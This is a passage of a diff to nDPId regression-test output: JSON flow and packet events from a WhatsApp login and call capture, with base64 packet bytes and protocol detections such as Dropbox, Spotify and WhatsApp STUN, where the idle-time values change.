-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1432582245550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245550,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo3Q8AAO8Gtl8RrGQIwKgCBAG7wA+S6qdT+EuQ5FARn\/5SOwAA"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1432582245576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245576,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/ZBAAEAGBN\/AqAIEEaxkCMAPAbv4S5DkkuqnVFAQ\/\/\/yOQAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582244297,"flow_last_seen":1432582244297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582244297,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.31","src_port":49164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1432582244297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244297,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAojkRAAEAGShnAqAIEEaeOH8AMAbt6TdZMbFoWmFAR\/\/+4DAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1432582244435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244435,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoqu8AAO0GwG0Rp44fwKgCBAG7wAxsWhaYek3WTVARn\/4YDQAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1432582244462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582244462,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoPbFAAEAGmqzAqAIEEaeOH8AMAbt6TdZNbFoWmVAQ\/\/+4CwAA"} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582245413,"flow_last_seen":1432582245413,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582245413,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1432582245413,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245413,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAodlRAAEAGjBvAqAIEEaxkCMAPAbv4S5DjkuqnU1AR\/\/\/yOgAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1432582245550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245550,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo3Q8AAO8Gtl8RrGQIwKgCBAG7wA+S6qdT+EuQ5FARn\/5SOwAA"} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1432582245576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582245576,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/ZBAAEAGBN\/AqAIEEaxkCMAPAbv4S5DkkuqnVFAQ\/\/\/yOQAA"} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01131{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1432582246280,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582246280,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAISN8UAAEARusXAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":281,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582246280,"flow_last_seen":1432582246280,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582246280,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1432582247125,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582247125,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIu7MAAEAROKHAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582247125,"flow_last_seen":1432582247125,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582247125,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
-00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0VdFAAEAGLmvAqAIEXT6WncAqAbtp\/2UpB8hbNoARIADD5gAAAQEICi36g7kNLSlg"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo02tAAEAGBQTAqAIEEaeODcAuAbvUT3p65yrTtlAR\/\/+B3QAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1432582249291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249291,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0DlQAAG4Gh+hdPpadwKgCBAG7wCoHyFs2af9lKoARAgLVtQAAAQEICg0tNY4t+oO5"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249292,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0W3xAAEAGKMDAqAIEXT6WncAqAbtp\/2UqB8hbN4AQIAC3ZgAAAQEICi36hAoNLTWO"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1432582249385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249385,"pkt":"APS5Jrv0xiwDYGpkCABFAAAony8AAO4Gyz8Rp44NwKgCBAG7wC7nKtO21E96e1ARn\/7h3QAA"} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1432582249492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249492,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo3x9AAEAG+U\/AqAIEEaeODcAuAbvUT3p75yrTt1AQ\/\/+B3AAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582250339,"flow_last_seen":1432582250339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582250339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1432582250339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250339,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoFBJAAEAGxF3AqAIEEaeODcAwAbsLr3wkAQ2ywFAR\/\/9P5gAA"} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1432582250476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250476,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoVmEAAO4GFA4Rp44NwKgCBAG7wDABDbLAC698JVARn\/6v5gAA"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1432582250618,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250618,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAotpxAAEAGIdPAqAIEEaeODcAwAbsLr3wlAQ2ywVAQ\/\/9P5QAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0VdFAAEAGLmvAqAIEXT6WncAqAbtp\/2UpB8hbNoARIADD5gAAAQEICi36g7kNLSlg"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582249235,"flow_last_seen":1432582249235,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582249235,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49198,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1432582249235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249235,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo02tAAEAGBQTAqAIEEaeODcAuAbvUT3p65yrTtlAR\/\/+B3QAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1432582249291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249291,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0DlQAAG4Gh+hdPpadwKgCBAG7wCoHyFs2af9lKoARAgLVtQAAAQEICg0tNY4t+oO5"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1432582249292,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582249292,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0W3xAAEAGKMDAqAIEXT6WncAqAbtp\/2UqB8hbN4AQIAC3ZgAAAQEICi36hAoNLTWO"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1432582249385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249385,"pkt":"APS5Jrv0xiwDYGpkCABFAAAony8AAO4Gyz8Rp44NwKgCBAG7wC7nKtO21E96e1ARn\/7h3QAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1432582249492,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582249492,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo3x9AAEAG+U\/AqAIEEaeODcAuAbvUT3p75yrTt1AQ\/\/+B3AAA"} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582250339,"flow_last_seen":1432582250339,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582250339,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.167.142.13","src_port":49200,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1432582250339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250339,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoFBJAAEAGxF3AqAIEEaeODcAwAbsLr3wkAQ2ywFAR\/\/9P5gAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1432582250476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250476,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoVmEAAO4GFA4Rp44NwKgCBAG7wDABDbLAC698JVARn\/6v5gAA"} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1432582250618,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582250618,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAotpxAAEAGIdPAqAIEEaeODcAwAbsLr3wlAQ2ywVAQ\/\/9P5QAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1432582258587,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582258587,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIJ6AAAEARMxjAqAIEAcJav8k+65gANBimAAEAGCESpEI2xNtJG9sue8sIM0EACAAU5G1owzzn9g07DgjX0q3CWkGBWA0="} 
00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582258587,"flow_last_seen":1432582258587,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582258587,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
@@ -256,79 +256,75 @@ 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":985,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1432582304464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1432582304464,"pkt":"xiwDYGpkAPS5Jrv0CABFwABIRQUAAEARFbPAqAIEAcJav846yg8ANIW7AAEAGCESpEIZoNpuKgJFUxs+kVcACAAURUHG5kUyySWGpYslvS2cuO+ddv8="} 01132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1432582306376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1432582306376,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIS5VYAAEARDTTAqAIBwKgC\/0RcRFwB\/jsJeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1